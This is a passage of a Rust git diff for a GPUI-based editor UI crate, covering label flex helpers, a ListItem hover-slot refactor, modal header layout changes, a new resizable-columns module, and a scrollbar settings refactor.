KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-f").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-f").unwrap())].into(), false), /// Hsla::black() /// ) /// .suffix("Find"); @@ -195,11 +189,10 @@ impl KeybindingHint { /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::new( - /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-z").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-z").unwrap())].into(), false), /// Hsla::black() /// ) /// .size(Pixels::from(16.0)); diff --git a/crates/ui/src/components/label/highlighted_label.rs b/crates/ui/src/components/label/highlighted_label.rs index 840bba7b173fe31a3472d758c64b0b1ef984da2c..73e03f82dfdef38f10c62b69be3b75da8a24dd08 100644 --- a/crates/ui/src/components/label/highlighted_label.rs +++ b/crates/ui/src/components/label/highlighted_label.rs @@ -1,6 +1,6 @@ use std::ops::Range; -use gpui::{FontWeight, HighlightStyle, StyledText}; +use gpui::{FontWeight, HighlightStyle, StyleRefinement, StyledText}; use crate::{LabelCommon, LabelLike, LabelSize, LineHeightStyle, prelude::*}; @@ -29,6 +29,33 @@ impl HighlightedLabel { } } + /// Constructs a label with the given byte ranges highlighted. + /// Assumes that the highlight ranges are valid UTF-8 byte positions. 
+ pub fn from_ranges( + label: impl Into, + highlight_ranges: Vec>, + ) -> Self { + let label = label.into(); + let highlight_indices = highlight_ranges + .iter() + .flat_map(|range| { + let mut indices = Vec::new(); + let mut index = range.start; + while index < range.end { + indices.push(index); + index += label[index..].chars().next().map_or(0, |c| c.len_utf8()); + } + indices + }) + .collect(); + + Self { + base: LabelLike::new(), + label, + highlight_indices, + } + } + pub fn text(&self) -> &str { self.label.as_str() } @@ -38,6 +65,40 @@ impl HighlightedLabel { } } +impl HighlightedLabel { + fn style(&mut self) -> &mut StyleRefinement { + self.base.base.style() + } + + pub fn flex_1(mut self) -> Self { + self.style().flex_grow = Some(1.); + self.style().flex_shrink = Some(1.); + self.style().flex_basis = Some(gpui::relative(0.).into()); + self + } + + pub fn flex_none(mut self) -> Self { + self.style().flex_grow = Some(0.); + self.style().flex_shrink = Some(0.); + self + } + + pub fn flex_grow(mut self) -> Self { + self.style().flex_grow = Some(1.); + self + } + + pub fn flex_shrink(mut self) -> Self { + self.style().flex_shrink = Some(1.); + self + } + + pub fn flex_shrink_0(mut self) -> Self { + self.style().flex_shrink = Some(0.); + self + } +} + impl LabelCommon for HighlightedLabel { fn size(mut self, size: LabelSize) -> Self { self.base = self.base.size(size); diff --git a/crates/ui/src/components/label/label.rs b/crates/ui/src/components/label/label.rs index d0f50c00336eb971621e2da7bbaf53cf09569caa..405948ea06c7e86fcb3dec217186596bdaaf0aeb 100644 --- a/crates/ui/src/components/label/label.rs +++ b/crates/ui/src/components/label/label.rs @@ -73,6 +73,34 @@ impl Label { gpui::margin_style_methods!({ visibility: pub }); + + pub fn flex_1(mut self) -> Self { + self.style().flex_grow = Some(1.); + self.style().flex_shrink = Some(1.); + self.style().flex_basis = Some(gpui::relative(0.).into()); + self + } + + pub fn flex_none(mut self) -> Self { + 
self.style().flex_grow = Some(0.); + self.style().flex_shrink = Some(0.); + self + } + + pub fn flex_grow(mut self) -> Self { + self.style().flex_grow = Some(1.); + self + } + + pub fn flex_shrink(mut self) -> Self { + self.style().flex_shrink = Some(1.); + self + } + + pub fn flex_shrink_0(mut self) -> Self { + self.style().flex_shrink = Some(0.); + self + } } impl LabelCommon for Label { diff --git a/crates/ui/src/components/label/label_like.rs b/crates/ui/src/components/label/label_like.rs index d87bdf6c12323c4858881f36af62f1a91cdd2aa1..5cad04efcfabcc80648c005f8d18ec5805970a39 100644 --- a/crates/ui/src/components/label/label_like.rs +++ b/crates/ui/src/components/label/label_like.rs @@ -1,8 +1,6 @@ use crate::prelude::*; use gpui::{FontWeight, Rems, StyleRefinement, UnderlineStyle}; -use settings::Settings; use smallvec::SmallVec; -use theme::ThemeSettings; /// Sets the size of a label #[derive(Debug, PartialEq, Clone, Copy, Default)] @@ -191,7 +189,7 @@ impl LabelCommon for LabelLike { } fn buffer_font(mut self, cx: &App) -> Self { - let font = theme::ThemeSettings::get_global(cx).buffer_font.clone(); + let font = theme::theme_settings(cx).buffer_font(cx).clone(); self.weight = Some(font.weight); self.base = self.base.font(font); self @@ -200,7 +198,7 @@ impl LabelCommon for LabelLike { fn inline_code(mut self, cx: &App) -> Self { self.base = self .base - .font(theme::ThemeSettings::get_global(cx).buffer_font.clone()) + .font(theme::theme_settings(cx).buffer_font(cx).clone()) .bg(cx.theme().colors().element_background) .rounded_sm() .px_0p5(); @@ -258,7 +256,7 @@ impl RenderOnce for LabelLike { .text_color(color) .font_weight( self.weight - .unwrap_or(ThemeSettings::get_global(cx).ui_font.weight), + .unwrap_or(theme::theme_settings(cx).ui_font(cx).weight), ) .children(self.children) } diff --git a/crates/ui/src/components/list/list_header.rs b/crates/ui/src/components/list/list_header.rs index 
8726dca50dada193b3051f14b6609a373fc60730..9d72366c3be4907c7d4e9e3dc0466903cbc58069 100644 --- a/crates/ui/src/components/list/list_header.rs +++ b/crates/ui/src/components/list/list_header.rs @@ -3,8 +3,7 @@ use std::sync::Arc; use crate::{Disclosure, prelude::*}; use component::{Component, ComponentScope, example_group_with_title, single_example}; use gpui::{AnyElement, ClickEvent}; -use settings::Settings; -use theme::ThemeSettings; +use theme::UiDensity; #[derive(IntoElement, RegisterComponent)] pub struct ListHeader { @@ -81,7 +80,7 @@ impl Toggleable for ListHeader { impl RenderOnce for ListHeader { fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { - let ui_density = ThemeSettings::get_global(cx).ui_density; + let ui_density = theme::theme_settings(cx).ui_density(cx); h_flex() .id(self.label.clone()) @@ -91,7 +90,7 @@ impl RenderOnce for ListHeader { .child( div() .map(|this| match ui_density { - theme::UiDensity::Comfortable => this.h_5(), + UiDensity::Comfortable => this.h_5(), _ => this.h_7(), }) .when(self.inset, |this| this.px_2()) diff --git a/crates/ui/src/components/list/list_item.rs b/crates/ui/src/components/list/list_item.rs index d581fad9453d9812f17b7bc9e0297fb9927c8188..9a764efd58cfd3365d92e534a715a0f23ce46e90 100644 --- a/crates/ui/src/components/list/list_item.rs +++ b/crates/ui/src/components/list/list_item.rs @@ -14,6 +14,14 @@ pub enum ListItemSpacing { Sparse, } +#[derive(Default)] +enum EndSlotVisibility { + #[default] + Always, + OnHover, + SwapOnHover(AnyElement), +} + #[derive(IntoElement, RegisterComponent)] pub struct ListItem { id: ElementId, @@ -28,9 +36,7 @@ pub struct ListItem { /// A slot for content that appears after the children, usually on the other side of the header. /// This might be a button, a disclosure arrow, a face pile, etc. end_slot: Option, - /// A slot for content that appears on hover after the children - /// It will obscure the `end_slot` when visible. 
- end_hover_slot: Option, + end_slot_visibility: EndSlotVisibility, toggle: Option, inset: bool, on_click: Option>, @@ -45,6 +51,8 @@ pub struct ListItem { rounded: bool, overflow_x: bool, focused: Option, + docked_right: bool, + height: Option, } impl ListItem { @@ -59,7 +67,7 @@ impl ListItem { indent_step_size: px(12.), start_slot: None, end_slot: None, - end_hover_slot: None, + end_slot_visibility: EndSlotVisibility::default(), toggle: None, inset: false, on_click: None, @@ -74,6 +82,8 @@ impl ListItem { rounded: false, overflow_x: false, focused: None, + docked_right: false, + height: None, } } @@ -161,8 +171,14 @@ impl ListItem { self } - pub fn end_hover_slot(mut self, end_hover_slot: impl Into>) -> Self { - self.end_hover_slot = end_hover_slot.into().map(IntoElement::into_any_element); + pub fn end_slot_on_hover(mut self, end_slot_on_hover: E) -> Self { + self.end_slot_visibility = + EndSlotVisibility::SwapOnHover(end_slot_on_hover.into_any_element()); + self + } + + pub fn show_end_slot_on_hover(mut self) -> Self { + self.end_slot_visibility = EndSlotVisibility::OnHover; self } @@ -185,6 +201,16 @@ impl ListItem { self.focused = Some(focused); self } + + pub fn docked_right(mut self, docked_right: bool) -> Self { + self.docked_right = docked_right; + self + } + + pub fn height(mut self, height: Pixels) -> Self { + self.height = Some(height); + self + } } impl Disableable for ListItem { @@ -213,32 +239,31 @@ impl RenderOnce for ListItem { .id(self.id) .when_some(self.group_name, |this, group| this.group(group)) .w_full() + .when_some(self.height, |this, height| this.h(height)) .relative() // When an item is inset draw the indent spacing outside of the item .when(self.inset, |this| { this.ml(self.indent_level as f32 * self.indent_step_size) .px(DynamicSpacing::Base04.rems(cx)) }) - .when(!self.inset && !self.disabled, |this| { - this - // TODO: Add focus state - // .when(self.state == InteractionState::Focused, |this| { - .when_some(self.focused, |this, 
focused| { - if focused { - this.border_1() - .border_color(cx.theme().colors().border_focused) - } else { - this.border_1() - } - }) - .when(self.selectable, |this| { - this.hover(|style| style.bg(cx.theme().colors().ghost_element_hover)) - .active(|style| style.bg(cx.theme().colors().ghost_element_active)) - .when(self.outlined, |this| this.rounded_sm()) - .when(self.selected, |this| { - this.bg(cx.theme().colors().ghost_element_selected) - }) - }) + .when(!self.inset, |this| { + this.when_some(self.focused, |this, focused| { + if focused && !self.disabled { + this.border_1() + .when(self.docked_right, |this| this.border_r_2()) + .border_color(cx.theme().colors().border_focused) + } else { + this.border_1() + } + }) + .when(self.selectable && !self.disabled, |this| { + this.hover(|style| style.bg(cx.theme().colors().ghost_element_hover)) + .active(|style| style.bg(cx.theme().colors().ghost_element_active)) + .when(self.outlined, |this| this.rounded_sm()) + .when(self.selected, |this| { + this.bg(cx.theme().colors().ghost_element_selected) + }) + }) }) .when(self.rounded, |this| this.rounded_sm()) .when_some(self.on_hover, |this, on_hover| this.on_hover(on_hover)) @@ -255,27 +280,22 @@ impl RenderOnce for ListItem { ListItemSpacing::ExtraDense => this.py_neg_px(), ListItemSpacing::Sparse => this.py_1(), }) - .when(self.inset && !self.disabled, |this| { - this - // TODO: Add focus state - //.when(self.state == InteractionState::Focused, |this| { - .when_some(self.focused, |this, focused| { - if focused { - this.border_1() - .border_color(cx.theme().colors().border_focused) - } else { - this.border_1() - } - }) - .when(self.selectable, |this| { - this.hover(|style| { - style.bg(cx.theme().colors().ghost_element_hover) - }) + .when(self.inset, |this| { + this.when_some(self.focused, |this, focused| { + if focused && !self.disabled { + this.border_1() + .border_color(cx.theme().colors().border_focused) + } else { + this.border_1() + } + }) + .when(self.selectable && 
!self.disabled, |this| { + this.hover(|style| style.bg(cx.theme().colors().ghost_element_hover)) .active(|style| style.bg(cx.theme().colors().ghost_element_active)) .when(self.selected, |this| { this.bg(cx.theme().colors().ghost_element_selected) }) - }) + }) }) .when_some( self.on_click.filter(|_| !self.disabled), @@ -330,28 +350,31 @@ impl RenderOnce for ListItem { .children(self.start_slot) .children(self.children), ) + .when(self.end_slot.is_some(), |this| this.justify_between()) .when_some(self.end_slot, |this, end_slot| { - this.justify_between().child( - h_flex() + this.child(match self.end_slot_visibility { + EndSlotVisibility::Always => { + h_flex().flex_shrink().overflow_hidden().child(end_slot) + } + EndSlotVisibility::OnHover => h_flex() .flex_shrink() .overflow_hidden() - .when(self.end_hover_slot.is_some(), |this| { - this.visible() - .group_hover("list_item", |this| this.invisible()) - }) - .child(end_slot), - ) - }) - .when_some(self.end_hover_slot, |this, end_hover_slot| { - this.child( - h_flex() - .h_full() - .absolute() - .right(DynamicSpacing::Base06.rems(cx)) - .top_0() .visible_on_hover("list_item") - .child(end_hover_slot), - ) + .child(end_slot), + EndSlotVisibility::SwapOnHover(hover_slot) => h_flex() + .relative() + .flex_shrink() + .child(h_flex().visible_on_hover("list_item").child(hover_slot)) + .child( + h_flex() + .absolute() + .inset_0() + .justify_end() + .overflow_hidden() + .group_hover("list_item", |this| this.invisible()) + .child(end_slot), + ), + }) }), ) } diff --git a/crates/ui/src/components/modal.rs b/crates/ui/src/components/modal.rs index d67d2e0f1637afc3705ae04f6fd8b8676a87e15a..fbd5f42989e20d0c8aa98693ca9e13eaa1077280 100644 --- a/crates/ui/src/components/modal.rs +++ b/crates/ui/src/components/modal.rs @@ -1,7 +1,5 @@ -use crate::{ - Clickable, Color, DynamicSpacing, Headline, HeadlineSize, Icon, IconButton, IconButtonShape, - IconName, Label, LabelCommon, LabelSize, h_flex, v_flex, -}; +use crate::{IconButtonShape, 
prelude::*}; + use gpui::{prelude::FluentBuilder, *}; use smallvec::SmallVec; use theme::ActiveTheme; @@ -162,13 +160,14 @@ impl RenderOnce for ModalHeader { children.insert( 0, Headline::new(headline) - .size(HeadlineSize::XSmall) + .size(HeadlineSize::Small) .color(Color::Muted) .into_any_element(), ); } h_flex() + .min_w_0() .flex_none() .justify_between() .w_full() @@ -187,26 +186,33 @@ impl RenderOnce for ModalHeader { }) .child( v_flex() + .min_w_0() .flex_1() .child( h_flex() + .w_full() .gap_1() - .when_some(self.icon, |this, icon| this.child(icon)) - .children(children), + .justify_between() + .child( + h_flex() + .gap_1() + .when_some(self.icon, |this, icon| this.child(icon)) + .children(children), + ) + .when(self.show_dismiss_button, |this| { + this.child( + IconButton::new("dismiss", IconName::Close) + .icon_size(IconSize::Small) + .on_click(|_, window, cx| { + window.dispatch_action(menu::Cancel.boxed_clone(), cx); + }), + ) + }), ) .when_some(self.description, |this, description| { - this.child(Label::new(description).color(Color::Muted).mb_2()) + this.child(Label::new(description).color(Color::Muted).mb_2().flex_1()) }), ) - .when(self.show_dismiss_button, |this| { - this.child( - IconButton::new("dismiss", IconName::Close) - .shape(IconButtonShape::Square) - .on_click(|_, window, cx| { - window.dispatch_action(menu::Cancel.boxed_clone(), cx); - }), - ) - }) } } diff --git a/crates/ui/src/components/redistributable_columns.rs b/crates/ui/src/components/redistributable_columns.rs new file mode 100644 index 0000000000000000000000000000000000000000..cd22c31e19736e72e5d88676178053b49a3e65fd --- /dev/null +++ b/crates/ui/src/components/redistributable_columns.rs @@ -0,0 +1,485 @@ +use std::rc::Rc; + +use gpui::{ + AbsoluteLength, AppContext as _, Bounds, DefiniteLength, DragMoveEvent, Empty, Entity, Length, + WeakEntity, +}; +use itertools::intersperse_with; + +use super::data_table::table_row::{IntoTableRow as _, TableRow}; +use crate::{ + ActiveTheme 
as _, AnyElement, App, Context, Div, FluentBuilder as _, InteractiveElement, + IntoElement, ParentElement, Pixels, StatefulInteractiveElement, Styled, Window, div, h_flex, + px, +}; + +const RESIZE_COLUMN_WIDTH: f32 = 8.0; +const RESIZE_DIVIDER_WIDTH: f32 = 1.0; + +#[derive(Debug)] +struct DraggedColumn(usize); + +#[derive(Debug, Copy, Clone, PartialEq)] +pub enum TableResizeBehavior { + None, + Resizable, + MinSize(f32), +} + +impl TableResizeBehavior { + pub fn is_resizable(&self) -> bool { + *self != TableResizeBehavior::None + } + + pub fn min_size(&self) -> Option { + match self { + TableResizeBehavior::None => None, + TableResizeBehavior::Resizable => Some(0.05), + TableResizeBehavior::MinSize(min_size) => Some(*min_size), + } + } +} + +#[derive(Clone)] +pub struct HeaderResizeInfo { + pub columns_state: WeakEntity, + pub resize_behavior: TableRow, +} + +impl HeaderResizeInfo { + pub fn from_state(columns_state: &Entity, cx: &App) -> Self { + let resize_behavior = columns_state.read(cx).resize_behavior().clone(); + Self { + columns_state: columns_state.downgrade(), + resize_behavior, + } + } +} + +pub struct RedistributableColumnsState { + pub(crate) initial_widths: TableRow, + pub(crate) committed_widths: TableRow, + pub(crate) preview_widths: TableRow, + pub(crate) resize_behavior: TableRow, + pub(crate) cached_container_width: Pixels, +} + +impl RedistributableColumnsState { + pub fn new( + cols: usize, + initial_widths: Vec>, + resize_behavior: Vec, + ) -> Self { + let widths: TableRow = initial_widths + .into_iter() + .map(Into::into) + .collect::>() + .into_table_row(cols); + Self { + initial_widths: widths.clone(), + committed_widths: widths.clone(), + preview_widths: widths, + resize_behavior: resize_behavior.into_table_row(cols), + cached_container_width: Default::default(), + } + } + + pub fn cols(&self) -> usize { + self.committed_widths.cols() + } + + pub fn initial_widths(&self) -> &TableRow { + &self.initial_widths + } + + pub fn 
preview_widths(&self) -> &TableRow { + &self.preview_widths + } + + pub fn resize_behavior(&self) -> &TableRow { + &self.resize_behavior + } + + pub fn widths_to_render(&self) -> TableRow { + self.preview_widths.map_cloned(Length::Definite) + } + + pub fn preview_fractions(&self, rem_size: Pixels) -> TableRow { + if self.cached_container_width > px(0.) { + self.preview_widths + .map_ref(|length| Self::get_fraction(length, self.cached_container_width, rem_size)) + } else { + self.preview_widths.map_ref(|length| match length { + DefiniteLength::Fraction(fraction) => *fraction, + DefiniteLength::Absolute(_) => 0.0, + }) + } + } + + pub fn preview_column_width(&self, column_index: usize, window: &Window) -> Option { + let width = self.preview_widths().as_slice().get(column_index)?; + match width { + DefiniteLength::Fraction(fraction) if self.cached_container_width > px(0.) => { + Some(self.cached_container_width * *fraction) + } + DefiniteLength::Fraction(_) => None, + DefiniteLength::Absolute(AbsoluteLength::Pixels(pixels)) => Some(*pixels), + DefiniteLength::Absolute(AbsoluteLength::Rems(rems_width)) => { + Some(rems_width.to_pixels(window.rem_size())) + } + } + } + + pub fn cached_container_width(&self) -> Pixels { + self.cached_container_width + } + + pub fn set_cached_container_width(&mut self, width: Pixels) { + self.cached_container_width = width; + } + + pub fn commit_preview(&mut self) { + self.committed_widths = self.preview_widths.clone(); + } + + pub fn reset_column_to_initial_width(&mut self, column_index: usize, window: &Window) { + let bounds_width = self.cached_container_width; + if bounds_width <= px(0.) 
{ + return; + } + + let rem_size = window.rem_size(); + let initial_sizes = self + .initial_widths + .map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); + let widths = self + .committed_widths + .map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); + + let updated_widths = + Self::reset_to_initial_size(column_index, widths, initial_sizes, &self.resize_behavior); + self.committed_widths = updated_widths.map(DefiniteLength::Fraction); + self.preview_widths = self.committed_widths.clone(); + } + + fn get_fraction(length: &DefiniteLength, bounds_width: Pixels, rem_size: Pixels) -> f32 { + match length { + DefiniteLength::Absolute(AbsoluteLength::Pixels(pixels)) => *pixels / bounds_width, + DefiniteLength::Absolute(AbsoluteLength::Rems(rems_width)) => { + rems_width.to_pixels(rem_size) / bounds_width + } + DefiniteLength::Fraction(fraction) => *fraction, + } + } + + pub(crate) fn reset_to_initial_size( + col_idx: usize, + mut widths: TableRow, + initial_sizes: TableRow, + resize_behavior: &TableRow, + ) -> TableRow { + let diff = initial_sizes[col_idx] - widths[col_idx]; + + let left_diff = + initial_sizes[..col_idx].iter().sum::() - widths[..col_idx].iter().sum::(); + let right_diff = initial_sizes[col_idx + 1..].iter().sum::() + - widths[col_idx + 1..].iter().sum::(); + + let go_left_first = if diff < 0.0 { + left_diff > right_diff + } else { + left_diff < right_diff + }; + + if !go_left_first { + let diff_remaining = + Self::propagate_resize_diff(diff, col_idx, &mut widths, resize_behavior, 1); + + if diff_remaining != 0.0 && col_idx > 0 { + Self::propagate_resize_diff( + diff_remaining, + col_idx, + &mut widths, + resize_behavior, + -1, + ); + } + } else { + let diff_remaining = + Self::propagate_resize_diff(diff, col_idx, &mut widths, resize_behavior, -1); + + if diff_remaining != 0.0 { + Self::propagate_resize_diff( + diff_remaining, + col_idx, + &mut widths, + resize_behavior, + 1, + ); + } + } + + widths + } + + fn 
on_drag_move( + &mut self, + drag_event: &DragMoveEvent, + window: &mut Window, + cx: &mut Context, + ) { + let drag_position = drag_event.event.position; + let bounds = drag_event.bounds; + let bounds_width = bounds.right() - bounds.left(); + if bounds_width <= px(0.) { + return; + } + + let mut col_position = 0.0; + let rem_size = window.rem_size(); + let col_idx = drag_event.drag(cx).0; + + let divider_width = Self::get_fraction( + &DefiniteLength::Absolute(AbsoluteLength::Pixels(px(RESIZE_DIVIDER_WIDTH))), + bounds_width, + rem_size, + ); + + let mut widths = self + .committed_widths + .map_ref(|length| Self::get_fraction(length, bounds_width, rem_size)); + + for length in widths[0..=col_idx].iter() { + col_position += length + divider_width; + } + + let mut total_length_ratio = col_position; + for length in widths[col_idx + 1..].iter() { + total_length_ratio += length; + } + let cols = self.resize_behavior.cols(); + total_length_ratio += (cols - 1 - col_idx) as f32 * divider_width; + + let drag_fraction = (drag_position.x - bounds.left()) / bounds_width; + let drag_fraction = drag_fraction * total_length_ratio; + let diff = drag_fraction - col_position - divider_width / 2.0; + + Self::drag_column_handle(diff, col_idx, &mut widths, &self.resize_behavior); + + self.preview_widths = widths.map(DefiniteLength::Fraction); + } + + pub(crate) fn drag_column_handle( + diff: f32, + col_idx: usize, + widths: &mut TableRow, + resize_behavior: &TableRow, + ) { + if diff > 0.0 { + Self::propagate_resize_diff(diff, col_idx, widths, resize_behavior, 1); + } else { + Self::propagate_resize_diff(-diff, col_idx + 1, widths, resize_behavior, -1); + } + } + + pub(crate) fn propagate_resize_diff( + diff: f32, + col_idx: usize, + widths: &mut TableRow, + resize_behavior: &TableRow, + direction: i8, + ) -> f32 { + let mut diff_remaining = diff; + if resize_behavior[col_idx].min_size().is_none() { + return diff; + } + + let step_right; + let step_left; + if direction < 0 { + 
step_right = 0; + step_left = 1; + } else { + step_right = 1; + step_left = 0; + } + if col_idx == 0 && direction < 0 { + return diff; + } + let mut curr_column = col_idx + step_right - step_left; + + while diff_remaining != 0.0 && curr_column < widths.cols() { + let Some(min_size) = resize_behavior[curr_column].min_size() else { + if curr_column == 0 { + break; + } + curr_column -= step_left; + curr_column += step_right; + continue; + }; + + let curr_width = widths[curr_column] - diff_remaining; + widths[curr_column] = curr_width; + + if min_size > curr_width { + diff_remaining = min_size - curr_width; + widths[curr_column] = min_size; + } else { + diff_remaining = 0.0; + break; + } + if curr_column == 0 { + break; + } + curr_column -= step_left; + curr_column += step_right; + } + widths[col_idx] = widths[col_idx] + (diff - diff_remaining); + + diff_remaining + } +} + +pub fn bind_redistributable_columns( + container: Div, + columns_state: Entity, +) -> Div { + container + .on_drag_move::({ + let columns_state = columns_state.clone(); + move |event, window, cx| { + columns_state.update(cx, |columns, cx| { + columns.on_drag_move(event, window, cx); + }); + } + }) + .on_children_prepainted({ + let columns_state = columns_state.clone(); + move |bounds, _, cx| { + if let Some(width) = child_bounds_width(&bounds) { + columns_state.update(cx, |columns, _| { + columns.set_cached_container_width(width); + }); + } + } + }) + .on_drop::(move |_, _, cx| { + columns_state.update(cx, |columns, _| { + columns.commit_preview(); + }); + }) +} + +pub fn render_redistributable_columns_resize_handles( + columns_state: &Entity, + window: &mut Window, + cx: &mut App, +) -> AnyElement { + let (column_widths, resize_behavior) = { + let state = columns_state.read(cx); + (state.widths_to_render(), state.resize_behavior().clone()) + }; + + let mut column_ix = 0; + let resize_behavior = Rc::new(resize_behavior); + let dividers = intersperse_with( + column_widths + .as_slice() + .iter() + 
.copied() + .map(|width| resize_spacer(width).into_any_element()), + || { + let current_column_ix = column_ix; + let resize_behavior = Rc::clone(&resize_behavior); + let columns_state = columns_state.clone(); + column_ix += 1; + + window.with_id(current_column_ix, |window| { + let mut resize_divider = div() + .id(current_column_ix) + .relative() + .top_0() + .w(px(RESIZE_DIVIDER_WIDTH)) + .h_full() + .bg(cx.theme().colors().border.opacity(0.8)); + + let mut resize_handle = div() + .id("column-resize-handle") + .absolute() + .left_neg_0p5() + .w(px(RESIZE_COLUMN_WIDTH)) + .h_full(); + + if resize_behavior[current_column_ix].is_resizable() { + let is_highlighted = window.use_state(cx, |_window, _cx| false); + + resize_divider = resize_divider.when(*is_highlighted.read(cx), |div| { + div.bg(cx.theme().colors().border_focused) + }); + + resize_handle = resize_handle + .on_hover({ + let is_highlighted = is_highlighted.clone(); + move |&was_hovered, _, cx| is_highlighted.write(cx, was_hovered) + }) + .cursor_col_resize() + .on_click({ + let columns_state = columns_state.clone(); + move |event, window, cx| { + if event.click_count() >= 2 { + columns_state.update(cx, |columns, _| { + columns.reset_column_to_initial_width( + current_column_ix, + window, + ); + }); + } + + cx.stop_propagation(); + } + }) + .on_drag(DraggedColumn(current_column_ix), { + let is_highlighted = is_highlighted.clone(); + move |_, _offset, _window, cx| { + is_highlighted.write(cx, true); + cx.new(|_cx| Empty) + } + }) + .on_drop::(move |_, _, cx| { + is_highlighted.write(cx, false); + columns_state.update(cx, |state, _| { + state.commit_preview(); + }); + }); + } + + resize_divider.child(resize_handle).into_any_element() + }) + }, + ); + + h_flex() + .id("resize-handles") + .absolute() + .inset_0() + .w_full() + .children(dividers) + .into_any_element() +} + +fn resize_spacer(width: Length) -> Div { + div().w(width).h_full() +} + +fn child_bounds_width(bounds: &[Bounds]) -> Option { + let 
first_bounds = bounds.first()?; + let mut left = first_bounds.left(); + let mut right = first_bounds.right(); + + for bound in bounds.iter().skip(1) { + left = left.min(bound.left()); + right = right.max(bound.right()); + } + + Some(right - left) +} diff --git a/crates/ui/src/components/scrollbar.rs b/crates/ui/src/components/scrollbar.rs index 8e8e89be9c0580a7820685b5690a996dfd2dade0..86f5e3b4ccbe80dd340cbeafb52ed499bb79895a 100644 --- a/crates/ui/src/components/scrollbar.rs +++ b/crates/ui/src/components/scrollbar.rs @@ -9,16 +9,15 @@ use gpui::{ Along, App, AppContext as _, Axis as ScrollbarAxis, BorderStyle, Bounds, ContentMask, Context, Corner, Corners, CursorStyle, DispatchPhase, Div, Edges, Element, ElementId, Entity, EntityId, GlobalElementId, Hitbox, HitboxBehavior, Hsla, InteractiveElement, IntoElement, IsZero, - LayoutId, ListState, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Negate, - ParentElement, Pixels, Point, Position, Render, ScrollHandle, ScrollWheelEvent, Size, Stateful, + LayoutId, ListState, MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, ParentElement, + Pixels, Point, Position, Render, ScrollHandle, ScrollWheelEvent, Size, Stateful, StatefulInteractiveElement, Style, Styled, Task, UniformListDecoration, UniformListScrollHandle, Window, ease_in_out, prelude::FluentBuilder as _, px, quad, relative, size, }; -use settings::SettingsStore; +use gpui_util::ResultExt; use smallvec::SmallVec; use theme::ActiveTheme as _; -use util::ResultExt; use std::ops::Range; @@ -34,7 +33,6 @@ pub mod scrollbars { use gpui::{App, Global}; use schemars::JsonSchema; use serde::{Deserialize, Serialize}; - use settings::Settings; /// When to show the scrollbar in the editor. 
/// @@ -54,28 +52,7 @@ pub mod scrollbars { Never, } - impl From for ShowScrollbar { - fn from(value: settings::ShowScrollbar) -> Self { - match value { - settings::ShowScrollbar::Auto => ShowScrollbar::Auto, - settings::ShowScrollbar::System => ShowScrollbar::System, - settings::ShowScrollbar::Always => ShowScrollbar::Always, - settings::ShowScrollbar::Never => ShowScrollbar::Never, - } - } - } - - pub trait GlobalSetting { - fn get_value(cx: &App) -> &Self; - } - - impl GlobalSetting for T { - fn get_value(cx: &App) -> &T { - T::get_global(cx) - } - } - - pub trait ScrollbarVisibility: GlobalSetting + 'static { + pub trait ScrollbarVisibility: 'static { fn visibility(&self, cx: &App) -> ShowScrollbar; } @@ -103,11 +80,9 @@ where let element_id = config.id.take().unwrap_or_else(|| caller_location.into()); let track_color = config.track_color; - let state = window.use_keyed_state(element_id, cx, |window, cx| { + let state = window.use_keyed_state(element_id, cx, |_, cx| { let parent_id = cx.entity_id(); - ScrollbarStateWrapper( - cx.new(|cx| ScrollbarState::new_from_config(config, parent_id, window, cx)), - ) + ScrollbarStateWrapper(cx.new(|cx| ScrollbarState::new_from_config(config, parent_id, cx))) }); state.update(cx, |state, cx| { @@ -258,7 +233,7 @@ impl UniformListDecoration for ScrollbarStateWrapper { _cx: &mut App, ) -> gpui::AnyElement { ScrollbarElement { - origin: scroll_offset.negate(), + origin: -scroll_offset, state: self.0.clone(), } .into_any() @@ -399,8 +374,8 @@ impl Scrollbars { Self::new_with_setting(show_along, |_| ShowScrollbar::Always) } - pub fn for_settings() -> Scrollbars { - Scrollbars::new_with_setting(ScrollAxes::Both, |cx| S::get_value(cx).visibility(cx)) + pub fn for_settings() -> Scrollbars { + Scrollbars::new_with_setting(ScrollAxes::Both, |cx| S::default().visibility(cx)) } } @@ -589,6 +564,16 @@ enum ParentHoverEvent { Outside, } +pub fn on_new_scrollbars(cx: &mut App) { + cx.observe_new::(|_, window, cx| { + if let Some(window) = 
window { + cx.observe_global_in::(window, ScrollbarState::settings_changed) + .detach(); + } + }) + .detach(); +} + /// This is used to ensure notifies within the state do not notify the parent /// unintentionally. struct ScrollbarStateWrapper(Entity>); @@ -611,15 +596,7 @@ struct ScrollbarState { } impl ScrollbarState { - fn new_from_config( - config: Scrollbars, - parent_id: EntityId, - window: &mut Window, - cx: &mut Context, - ) -> Self { - cx.observe_global_in::(window, Self::settings_changed) - .detach(); - + fn new_from_config(config: Scrollbars, parent_id: EntityId, cx: &mut Context) -> Self { let (manually_added, scroll_handle) = match config.scrollable_handle { Handle::Tracked(handle) => (true, handle), Handle::Untracked(func) => (false, func()), @@ -911,7 +888,7 @@ impl ThumbState { } impl ScrollableHandle for UniformListScrollHandle { - fn max_offset(&self) -> Size { + fn max_offset(&self) -> Point { self.0.borrow().base_handle.max_offset() } @@ -929,7 +906,7 @@ impl ScrollableHandle for UniformListScrollHandle { } impl ScrollableHandle for ListState { - fn max_offset(&self) -> Size { + fn max_offset(&self) -> Point { self.max_offset_for_scrollbar() } @@ -955,7 +932,7 @@ impl ScrollableHandle for ListState { } impl ScrollableHandle for ScrollHandle { - fn max_offset(&self) -> Size { + fn max_offset(&self) -> Point { self.max_offset() } @@ -973,7 +950,7 @@ impl ScrollableHandle for ScrollHandle { } pub trait ScrollableHandle: 'static + Any + Sized + Clone { - fn max_offset(&self) -> 